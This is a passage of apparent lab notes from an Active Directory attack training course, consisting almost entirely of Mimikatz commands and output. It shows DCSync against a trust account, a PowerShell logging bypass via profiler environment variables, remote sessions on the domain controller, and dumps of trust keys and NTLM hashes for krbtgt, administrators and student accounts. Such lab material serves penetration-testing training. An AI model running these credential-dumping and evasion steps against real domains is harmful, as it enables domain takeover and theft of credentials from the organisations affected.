'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe" command of "standard"
module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz

cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::dcsync /user:dcorp\mcorp$

[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\mcorp$' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : mcorp$

** SAM ACCOUNT **

SAM Username : mcorp$

Account Type : 30000002 ( TRUST_ACCOUNT )
User Account Control : 00000820 ( PASSWD_NOTREQD INTERDOMAIN_TRUST_ACCOUNT )
Account expiration :
Password last change : 6/13/2024 9:05:32 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-1103
Object Relative ID : 1103

Credentials:
Hash NTLM: a8f73b279dc7257c7a8a2d0c911043d2
ntlm- 0: a8f73b279dc7257c7a8a2d0c911043d2
ntlm- 1: 692acf0a13b6446ee4898339932172be
ntlm- 2: 692acf0a13b6446ee4898339932172be
ntlm- 3: 692acf0a13b6446ee4898339932172be
ntlm- 4: d561ee73c6cbeea0a46457b8009aa170
ntlm- 5: be4adc80e847ea04dc6b44bf76b0d806
ntlm- 6: fab81df66adf534a1b064ec6e3dac658
ntlm- 7: 5bc8ac591b88a413f28d5977661e8e52
ntlm- 8: 5bc8ac591b88a413f28d5977661e8e52
ntlm- 9: 442dfe8d5e24bbef3bde661bcd435841
ntlm-10: 2034b61855f67d4eada3defb991940b0
ntlm-11: 2034b61855f67d4eada3defb991940b0
ntlm-12: 59b22ea0b63b069463456711ce6649a4
ntlm-13: 59b22ea0b63b069463456711ce6649a4
ntlm-14: 97c70358b2f68c8707275d60b04a39d5
ntlm-15: 97c70358b2f68c8707275d60b04a39d5
ntlm-16: 4166f5131d707f71bc4d94a20df1182b
ntlm-17: 2469e03430738ec884ca9d79b90f6753
ntlm-18: f13c02cdc42c545eb976669aff273ca4
ntlm-19: 3199214e479a6d209711d7f653fdfa8d
ntlm-20: 3199214e479a6d209711d7f653fdfa8d
 ntlm-21: 3199214e479a6d209711d7f653fdfa8d
ntlm-22: b8cfd19d366afa9f36221b305b5440bf
ntlm-23: 802514a59894e499cf292415c8d152c2
lm - 0: 880dffbd466245d4be9c70704eca53b8
lm - 1: f8cbb505e871df29e23ae4a4a2778ea9
lm - 2: 55cc1e9ea4b061514d1f1f3210effa29
lm - 3: f7f56c8afa31aee7f9fc684aaa6c46b2
lm - 4: 9ee32eba930a8ee88906c21699e451af
lm - 5: 26da753345f8b98046743d8a293be3cb
lm - 6: f81c7c0d0a34de15f9de642b6d42caeb
lm - 7: d62b628d55aa9162f8dc450360bc357f
lm - 8: 83d93a76dbfa00df70234493e73a6ce3
lm - 9: ff4d840e4820d9b0c08bc936cf8235b5
lm -10: 6f9ca1d9407d7b4862e6a702866e1244
lm -11: 8b2a3fa3c2dc365c4a6287168e51a8b1
lm -12: 3fe8a2bfac42c96c5b0bd6c082d26212
lm -13: 675e94041cdcccbea70aa9ccee41e11b
lm -14: 7060b2d56a315f0c0af1055471646d5e
lm -15: 748a7f5a95001aafe955f7877ca6e9fb
lm -16: 945515929b61517cb739c723b45147cf
lm -17: 67f3de4fdf0e556a7d587c3b3dd573e7
lm -18: 348ea186e37015ae6296b0d135c5b282
lm -19: e5a6ea8d1989a07251f41086e0283c92
lm -20: 4feafafdb95a5c87830e4d8e59b9aac8
lm -21: 69565fc1e5d2e77b6a6def541a424c52
lm -22: 1dec327b63079927d47dcb6f6cb4615a
lm -23: aff90a6cec45ae3c0fc9324aa6b160c0

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgtmcorp
Default Iterations : 4096
Credentials
aes256_hmac (4096) : a3641d2617d340f575fd9887d39ea62917146598ceb6884f514245846996869f
aes128_hmac (4096) : 2ddb5e4620b091f1b25edbe867faaf61
des_cbc_md5 (4096) : e301c257c4d95854
OldCredentials
aes256_hmac (4096) : 604c9d686c3ab88d80e263c05ef9f03a78560ca4c5ba75eacb83bb7b833bd6e4
aes128_hmac (4096) : b9872e40082bab1377e4451b459f673c
des_cbc_md5 (4096) : d604a43245f80d94
OlderCredentials
aes256_hmac (4096) : 604c9d686c3ab88d80e263c05ef9f03a78560ca4c5ba75eacb83bb7b833bd6e4
aes128_hmac (4096) : b9872e40082bab1377e4451b459f673c
des_cbc_md5 (4096) : d604a43245f80d94

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgtmcorp
Credentials
des_cbc_md5 : e301c257c4d95854
OldCredentials
des_cbc_md5 : d604a43245f80d94

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *
01 ffbe9dc1f901736fc1a64af088f42147
02 50250d44d39f272d45a959bf7dc6b4bd
03 9d39b50580db05b8e17cd72efdd3fc4c
 04 ffbe9dc1f901736fc1a64af088f42147
05 50250d44d39f272d45a959bf7dc6b4bd
06 b36ae76041e8eec2d6552b295459af57
07 ffbe9dc1f901736fc1a64af088f42147
08 03188e6cf47113fd7976795d13f94027
09 03188e6cf47113fd7976795d13f94027
10 c60cc6a03cb1559e34df389e944b7c2b
11 74bd1d549a65f210ead80af681d5839b
12 03188e6cf47113fd7976795d13f94027
13 8c255ecec5d4fe9649a1d0a0e6cf6c3d
14 74bd1d549a65f210ead80af681d5839b
15 c33ca24e2249f6e6bb3b65fa128140c1
16 c33ca24e2249f6e6bb3b65fa128140c1
17 ecad7512f48595730ee83e556764837e
18 654f799ec893c292b813c38ebec345d4
19 3acff4445598f6d2f4eab0f6c49e380a
20 2e0184f72cad0a41144ddc0c088e4c4a
21 a6c490ad7db55d3d2a82ac68dfeb1e28
22 a6c490ad7db55d3d2a82ac68dfeb1e28
23 58196264ccf3d90f55df62f6d027ecaa
24 50709fc009d15f6adf90e785acaa8922
25 50709fc009d15f6adf90e785acaa8922
26 c8019344d39510f9c8deb4df1d6a6e80
27 92b55ea933b435e64fc5fdf7fd548618
28 7ae32070227877546a727226d151c296
29 f5cc0de17036214a554922c0ed484ec6

mimikatz(commandline) # exit
Bye!

Invoke-Mimi
lsadump::trust /patch
The trust keys are also obtained using lsadump::trust /patch command of Mimikatz. We need to look for
the [IN] trust key from child to parent.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> Invoke-Command -ComputerName dcorp-dc.dollarcorp.moneycorp.local -

ScriptBlock { $env:username;$env:computername }
svcadmin
DCORP-DC
PS C:\Windows\system32> $session = New-PSSession -ComputerName dcorp-
dc.dollarcorp.moneycorp.local
PS C:\Windows\system32> Invoke-Command -Session $session -FilePath C:\AD\Tools\Invoke-MimiEx.ps1
PS C:\Windows\system32> Enter-PSSession -Session $session
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Invoke-Mimi -Command
'"lsadump::trust /patch"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::trust /patch

Current domain: DOLLARCORP.MONEYCORP.LOCAL (dcorp / S-1-5-21-719815819-3726368948-3917688648)

Domain: MONEYCORP.LOCAL (mcorp / S-1-5-21-335606122-960912869-3279953914)

[ In ] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL
* 6/13/2024 9:05:32 PM - CLEAR - 2a 89 1d fb 1f 4e c3 5f 53 b7 79 2a 8a f1 fc ad 7f 1d 22
a0 24 25 01 2d f0 2e dd cb c1 9c 65 3c 3d a9 ba 00 2f 78 d4 dd 71 9b de d0 ab 14 c2 49 ac e8 dc
b8 2f 51 dc d8 e6 98 f2 0b 29 2f 1a b9 93 9b e0 c5 63 22 cf 39 f0 1c f4 27 cc 14 92 15 20 74 9b
38 32 86 eb 21 9b 98 a1 9b 03 a8 59 3d af ca 3c 88 4e 17 cd b1 29 9a 2c 9a 11 3e af 44 dd aa 03
76 01 3a f6 1a c4 ca 61 ee df 41 08 61 21 0b 3a 79 99 aa 89 9c 4e ca 42 79 c8 85 2a a6 18 36 6b
18 94 63 ce df cc 58 ff 95 81 d3 e9 e1 48 4a 85 2d c2 61 0a cd 2c b9 1a 58 a6 9c 9a 7d e4 b4 27
32 c1 df ee 48 90 03 35 fe 77 e6 97 37 6a 75 91 10 45 bc 91 29 69 db 9c 00 5a 06 e0 31 fe 44 17
c4 09 ec 7a 39 ca 46 b3 0f 8f d0 e9 39 e6 8d 2c 02 be 6b bd 2c c5 4b 13 a9 9d 14 43 e0
* aes256_hmac 09e60c921003dd4b72c5fbd63cb52aac316ef305e797a5b9d837c5a6134b310a
* aes128_hmac 7eea125ae826bb26dc8e273b6b8685b2
* rc4_hmac_nt a8f73b279dc7257c7a8a2d0c911043d2

[ Out ] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL

* 6/13/2024 9:01:43 PM - CLEAR - d9 10 c3 61 76 ff 36 ad e2 65 a8 d5 4e f3 84 92 b0 82 73
3d 5f 35 a0 ed 30 96 2d 39 64 c3 82 3b 16 0b af ae ae ff a4 77 05 2c f5 47 2a d6 77 a5 69 25 5a
a7 a7 e5 3f 4e 09 c7 e0 31 f4 e2 53 49 0e f2 e9 e3 1c 5a 7b d8 1d 06 9c 95 98 ea 38 2b 45 d3 76
be 15 d2 8b c3 31 38 06 fb ca 0f 36 c1 de b1 a2 df 3a 05 4e 14 e4 17 04 57 81 18 06 77 ef 6d da
bb e3 60 42 ce 53 d7 a4 31 31 d8 98 05 06 e4 5a af bb dc e4 5c ff f1 43 46 9a aa 08 90 4b 25 35
5e 5d 48 21 eb 44 f3 33 bc 4f 03 d5 fc 69 29 b7 de 2b ad 9c 1c 73 a0 cc a5 79 e5 91 13 b3 d3 af
c8 fa 92 cc 6f 13 2f a1 7d d1 28 de ef 96 90 8f 6d 14 36 25 0a 4c af 57 ae 51 5d 9a 8e 26 90 02
12 64 85 1b 28 9f 72 1c 49 b0 90 92 a0 b7 88 69 b7 96 87 bf 00 a4 a4 b2 35 fa 57 c7 8e
* aes256_hmac 574a1d8ebb609f51bb9028d6c47edd340c5076be83d1336f877e9fc209ffa637
* aes128_hmac c2b6e81c3d0b8e91df418a3a32d1132f
* rc4_hmac_nt 170847fffcf86c9d2dcc4c45cc734e2b

[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> MONEYCORP.LOCAL

* 5/3/2024 9:05:28 PM - CLEAR - 40 1f 1d 77 a1 92 53 70 df 55 ca 73 b4 c6 8c b7 c2 ed 76 f0
cd ac f9 82 f7 09 01 aa ad 62 62 a9 0a 81 a5 73 9d ff 02 dd 13 ce 65 74 5b 4a b9 ec 91 1d e7 bc
c3 45 93 05 79 a9 e7 58 9a a0 d0 46 2a 9d 33 1e 09 bb 51 a5 76 15 57 d0 db e0 5c 45 38 c7 93 57
b2 1d cf 14 c4 c7 48 f7 8d a7 53 31 12 4a 53 b6 45 a7 4c 9b 19 d5 c9 f6 e0 da 4f 01 d6 a1 6e 0b
2f 79 c2 49 95 61 81 da 67 d2 b6 7f ff 86 8a d8 5f 3a 99 49 62 be 6b 5a 31 29 b7 4e d4 2c a3 29
01 c7 94 86 8a 2c 5f 8e 76 f7 97 d3 7d c6 60 0a 66 9d 24 a5 9a 90 9b 3b 85 4a 89 b3 b0 6c e5 78
6a c2 08 27 e4 84 09 f9 f3 d9 f4 ec f6 35 f2 c2 9a 7b 4c 5d 7d 90 09 77 dd 60 6c 2b 06 01 0f d8
18 34 94 d7 4a a5 0f 5d 63 a4 7e a6 6a 14 f2 74 ba 75 1d 4d d0 36 fc ba 24 80 a8 6d
* aes256_hmac 55857d0270aa7dddf35db46932d75b53a8520c36ea3782ccd3403249e8f74786
* aes128_hmac a915717424b3d2b8630c55e5faf748e7
* rc4_hmac_nt 692acf0a13b6446ee4898339932172be

[Out-1] MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL

* 6/13/2024 9:01:43 PM - CLEAR - b8 a3 df 9c 39 7f c3 9f b9 de 9d 68 85 9b 4b c3 bc ca 63
2e df fc b1 db 5d 1f 18 5d 3e 9d 15 2f b6 68 b9 a4 7f ea 29 88 de 6f b3 ac cb fc 22 01 bd c3 c9
88 f5 05 d2 35 41 50 6c b9 1d ff 86 ee 02 75 9f 00 25 33 5d 43 c6 fb d5 42 d0 74 31 27 42 49 35
20 af 04 fe 13 21 81 78 2c 63 0c 8f c9 c0 ce 8e 94 08 92 8c 48 4c 30 36 5a 11 20 f5 70 d3 d0 a5
fa 43 df 1b db 57 da 5f 62 56 d5 83 71 07 eb 96 ba cc 5b bf 5f 42 08 5d 9f 7a fb 99 de 8d 8e 62
25 9a 39 0c 7e d2 4d a2 e7 1d 05 45 d2 ca 76 86 29 ad 33 24 fb 00 28 02 a2 0b d7 27 c8 c2 26 2c
66 bb e3 16 5a 00 98 a6 42 21 0c 24 71 08 57 3d 85 15 a8 ea d4 e3 f1 db 65 81 a4 ea fe 80 a0 24
34 03 7e 52 1a d0 22 ef c9 da 89 10 60 9b ca 0d 5e c6 e2 15 02 a9 d3 3a 51 a6 3f 3d 51
* aes256_hmac ca5dc3eec2614f058b015bca83b1bd630f1ce43f9dc260e024f601a77a9f07fb
* aes128_hmac 8bf703993346b04723ae9267c7ca3593
* rc4_hmac_nt 757d0a697d2c7eaf3ea5137543430a22

Domain: US.DOLLARCORP.MONEYCORP.LOCAL (US / S-1-5-21-1028785420-4100948154-1806204659)

[ In ] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL
* 7/3/2024 10:06:26 PM - CLEAR - 83 1a eb 7a ea 4e fe cf 18 a9 84 b8 0c ce 12 e2 46 0a 08
10 c9 db 94 ca c5 1f f9 9b
* aes256_hmac 5cf36b688ae83b1eeacdbc16b0acba87ab90f02aab39969c4a447b4162680a3e
* aes128_hmac ee01f44cbb5b8ac8388e7e249e539dd2
* rc4_hmac_nt 3bc75c500d5b5ff9d6d246c80da6a2fc

[ Out ] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL

* 7/3/2024 10:06:26 PM - CLEAR - 83 1a eb 7a ea 4e fe cf 18 a9 84 b8 0c ce 12 e2 46 0a 08
10 c9 db 94 ca c5 1f f9 9b
* aes256_hmac eb65fa45360257e32e90ff985ff48a7f9adc307c7d34d768e608c076590b248b
* aes128_hmac 1b68217402a894b802e4b28acfffedbd
* rc4_hmac_nt 3bc75c500d5b5ff9d6d246c80da6a2fc

[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> US.DOLLARCORP.MONEYCORP.LOCAL

* 5/4/2024 9:06:11 PM - CLEAR - 59 6a fc b7 91 b3 7f 68 bd e1 df 76 b5 ea 21 3e e1 ff f9 ed
fb 19 bd 65 11 f1 d0 dc 29 f5 1e d6 a4 a1 e4 50 de 1c 72 ab 54 3a 10 95 0d e2 8d ab 83 63 a3 be
e1 ee 28 8d ce e9 9b f1 e1 6c 74 b8 93 2c 79 05 17 6d e0 ca a3 90 ca 74 4f 87 90 46 d4 ae 28 fc
92 f3 02 69 cb fa e4 a6 91 98 b8 88 45 89 a0 76 35 4e 54 7b cf e8 24 54 a6 a1 63 b7 5d 85 e0 28
c6 79 51 6e 65 6b 90 e6 68 ce 8d b2 34 22 99 be fd 98 e9 50 bf fb 47 48 4e bb e1 2f 31 5b 26 7b
66 d5 a8 38 c0 16 9e 47 57 19 5a 60 a6 44 06 90 54 d1 39 95 77 c5 42 85 bb 67 84 18 70 a3 ec 53
91 1f 0a 62 0c 2f 15 e6 40 b5 fa eb 4d 03 c7 39 6d 9b 5c b6 3b b3 dd 5d 2d d3 15 c8 3b cf 0a 54
13 15 ee c0 9d 43 69 76 b9 c4 dc 61 0b 54 00 1a ed ee d1 4d ef 16 fb d9 e8 12 40 76
* aes256_hmac 5c388533716682abae7ccc5f6578210b1d5b8d3c36c360bc70eb42a6b3d73da7
* aes128_hmac ead9db9250708a18b2874c5e823a945c
* rc4_hmac_nt 93c84ded86cccbd8959d89337f0130b2

[Out-1] US.DOLLARCORP.MONEYCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL

* 6/15/2024 9:02:29 PM - CLEAR - 4e 5d 18 db 1e cb b8 d1 d2 08 d5 39 8d 63 1f 8d f7 fe de
77 b1 79 b8 c0 62 18 06 60 2b 6e 04 57 f3 8d a8 14 22 fa 1e 30 c2 55 5a 09 23 26 68 de a6 31 27
11 b5 be 9a f2 0a 51 cc be 43 22 41 75 4e 89 ce cc fa 69 d7 20 79 ae b8 54 77 14 62 e8 04 82 5a
d4 ab dc 82 8e ab 39 2b 6b dd 44 67 c1 ec 79 44 9b 7c 5d 2e 65 d4 56 db 10 dc ad fc e3 46 57 e1
80 ed e1 9d f4 05 d4 87 9a 3d c5 a0 a1 0c 82 58 71 08 ec 05 ce c4 1e 9c 81 7c 05 90 4b ee bc 55
4e 3b 6d c8 7b 0c 34 37 94 a9 1f 3f f3 fd 69 60 8e 63 9a 0a 40 65 eb 9d 88 63 7b da 83 3c 96 9c
3c 51 25 17 11 9e d6 da b6 b4 50 d3 73 c0 83 61 2a fd 31 91 28 65 b3 ac 0e e6 67 e9 3e 3c 69 62
7a ed 58 fe 4b 2f 3d 04 3b f4 25 d7 ce 0b 4d b7 d0 95 35 18 18 a2 46 05 7d b4 b6 bc d7
* aes256_hmac 9615182496dda937ff1320f133228817abff23c853f3f86c6e50df601f7fbd77
* aes128_hmac 969e2de28f56b8011f59288f39a5e87a
* rc4_hmac_nt 533a3e349ca3030f5ef794c1479c6343

Domain: EUROCORP.LOCAL (ecorp / S-1-5-21-3333069040-3914854601-3606488808)

[ In ] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL
* 7/3/2024 10:06:18 PM - CLEAR - 42 fd 91 8a 73 19 f9 64 3d 71 82 ad 5d 6f c3 2f 00 63 6f
73 28 89 38 09 67 7a 18 6c
* aes256_hmac f19dda97627c16d13397a0cacbe3cf50d66588a65576e5187cdc1654ff2f1b79
* aes128_hmac 07e0f4d54b1a6b7fdd8b795ea07cb075
 * rc4_hmac_nt 48535da9746fc33e5e04cca00c31a7e2

[ Out ] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL

* 7/3/2024 10:06:18 PM - CLEAR - 42 fd 91 8a 73 19 f9 64 3d 71 82 ad 5d 6f c3 2f 00 63 6f
73 28 89 38 09 67 7a 18 6c
* aes256_hmac 85d2a61c7e4263bb64eaf410f6a1408113243cee0aef3bd2aa050f6d69285907
* aes128_hmac c32996882da31e004c4dc95a8ab09b11
* rc4_hmac_nt 48535da9746fc33e5e04cca00c31a7e2

[ In-1] DOLLARCORP.MONEYCORP.LOCAL -> EUROCORP.LOCAL

* 6/26/2024 9:01:39 PM - CLEAR - 23 c3 9f 69 28 6b 93 17 29 a5 f3 1b c6 24 16 61 ff 3a 8b
04 17 3a 35 5c a2 6c 13 d7
* aes256_hmac fd77a2766cf1b9a86118f8e5ad692ab46fe292ccb0cc8bd3326be685a051bc3f
* aes128_hmac 78e5ed11bce7d5ec661e1e05abac1e89
* rc4_hmac_nt 7c36fa5f301d69efdbb07a1edf33c9df

[Out-1] EUROCORP.LOCAL -> DOLLARCORP.MONEYCORP.LOCAL

* 6/26/2024 9:01:39 PM - CLEAR - 23 c3 9f 69 28 6b 93 17 29 a5 f3 1b c6 24 16 61 ff 3a 8b
04 17 3a 35 5c a2 6c 13 d7
* aes256_hmac c7075e427455e20f0b758b70906a036002bc07cc81601506ea094524c5bd2fb7
* aes128_hmac 76964257460a93be4325636988824996
* rc4_hmac_nt 7c36fa5f301d69efdbb07a1edf33c9df

lsadump::lsa /patch
The trust keys can also be obtained by extracting all of the hashes from the LSASS.exe running process.
lsadump::lsa /patch
[dcorp-dc.dollarcorp.moneycorp.local]: PS C:\Users\svcadmin\Documents> Invoke-Mimi -Command
'"lsadump::lsa /patch"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # lsadump::lsa /patch

Domain : dcorp / S-1-5-21-719815819-3726368948-3917688648

RID : 000001f4 (500)

User : Administrator
LM :
NTLM : af0686cc0ca8f04df42210c9ac980760

RID : 000001f5 (501)

User : Guest
LM :
NTLM :

RID : 000001f6 (502)

User : krbtgt
LM :
NTLM : 4e9815869d2090ccfca61c1fe0d23986

RID : 00000459 (1113)

User : sqladmin
LM :
NTLM : 07e8be316e3da9a042a9cb681df19bf5

RID : 0000045a (1114)

User : websvc
LM :
NTLM : cc098f204c5887eaa8253e7c2749156f

RID : 0000045b (1115)

User : srvadmin
LM :
NTLM : a98e18228819e8eec3dfa33cb68b0728

RID : 0000045d (1117)

User : appadmin
LM :
NTLM : d549831a955fee51a43c83efb3928fa7

RID : 0000045e (1118)

User : svcadmin
LM :
NTLM : b38ff50264b74508085d82c69794a4d8

RID : 0000045f (1119)

User : testda
LM :
NTLM : a16452f790729fa34e8f3a08f234a82c

RID : 00000460 (1120)

User : mgmtadmin
LM :
NTLM : 95e2cd7ff77379e34c6e46265e75d754

RID : 00000461 (1121)

User : ciadmin
LM :
NTLM : e08253add90dccf1a208523d02998c3d

RID : 00000462 (1122)

User : sql1admin
LM :
NTLM : e999ae4bd06932620a1e78d2112138c6

RID : 00001055 (4181)

User : studentadmin
LM :
NTLM : d1254f303421d3cdbdc4c73a5bce0201

RID : 00003521 (13601)

User : student161
LM :
NTLM : 12fe951ecdce0ee2edd5a4d71a0d6e0b

RID : 00003522 (13602)

User : student162
LM :
NTLM : 2230beda3bcd55b72cc4c1a5ef8170e9

RID : 00003523 (13603)

User : student163
LM :
NTLM : ccbca8c20310dbc0c5c9dcf1fde108b8

RID : 00003524 (13604)

User : student164
LM :
NTLM : 55e3baaf40c19d73f46b601d3cbfd41b

RID : 00003525 (13605)

User : student165
LM :
NTLM : a42ea87cc59018a3b49ec5d9be31a646

RID : 00003526 (13606)

User : student166
LM :
NTLM : 24b141d31352ea4f12745579e4885756

RID : 00003527 (13607)

User : student167
LM :
NTLM : 5ea118645828dcab565bf5895ca4ea57

RID : 00003528 (13608)

User : student168
LM :
NTLM : 53171b516f11d8b38e9fb0572014ba55

RID : 00003529 (13609)

User : student169
LM :
NTLM : 5a231022659299b4a1f2d1651d1c5106

RID : 0000352a (13610)

User : student170
LM :
NTLM : 9b0a73646f1fab4f0321f4526f3ed8f1

RID : 0000352b (13611)

User : student171
LM :
NTLM : 83c26fe5a55558897267fdf9a0d91d0d

RID : 0000352c (13612)

User : student172
LM :
NTLM : 1c0175bcef53648c75a88d566d2df3da

RID : 0000352d (13613)

User : student173
LM :
NTLM : de2a9206f558dddf3ded7b5f3427182c

RID : 0000352e (13614)

User : student174
LM :
NTLM : 6c22f89d3c33d5d260f195be679212b3
RID : 0000352f (13615)
User : student175
LM :
NTLM : 2c102014852ffa9959434ac02dc0fecd

RID : 00003530 (13616)

User : student176
LM :
NTLM : a8918ce94dcd39974537493be3a4895c

RID : 00003531 (13617)

User : student177
LM :
NTLM : d348e38df9c4883b5f234d83deb038f3

RID : 00003532 (13618)

User : student178
LM :
NTLM : cc4f8e304a59ed00c47a87d42b7c107f

RID : 00003533 (13619)

User : student179
LM :
NTLM : 667598cfb79b5ca955c70afba1606ee2

RID : 00003534 (13620)

User : student180
LM :
NTLM : 2e893c9e2619ca18f0560e732c573eb9

RID : 00003535 (13621)

User : Control161user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003536 (13622)

User : Control162user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003537 (13623)

User : Control163user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003538 (13624)

User : Control164user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003539 (13625)

User : Control165user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353a (13626)

User : Control166user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0
RID : 0000353b (13627)
User : Control167user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353c (13628)

User : Control168user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353d (13629)

User : Control169user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353e (13630)

User : Control170user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 0000353f (13631)

User : Control171user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003540 (13632)

User : Control172user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003541 (13633)

User : Control173user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003542 (13634)

User : Control174user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003543 (13635)

User : Control175user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003544 (13636)

User : Control176user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003545 (13637)

User : Control177user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003546 (13638)

User : Control178user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003547 (13639)

User : Control179user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003548 (13640)

User : Control180user
LM :
NTLM : c8aed8673aca42f9a83ff8d2c84860f0

RID : 00003549 (13641)

User : Support161user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354a (13642)

User : Support162user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354b (13643)

User : Support163user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354c (13644)

User : Support164user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354d (13645)

User : Support165user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354e (13646)

User : Support166user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 0000354f (13647)

User : Support167user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003550 (13648)

User : Support168user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003551 (13649)

User : Support169user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003552 (13650)

User : Support170user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003553 (13651)

User : Support171user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003554 (13652)

User : Support172user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003555 (13653)

User : Support173user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003556 (13654)

User : Support174user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

RID : 00003557 (13655)

User : Support175user
LM :
NTLM : b2e40f5d46efcbb1094704aeb7d9cbe7

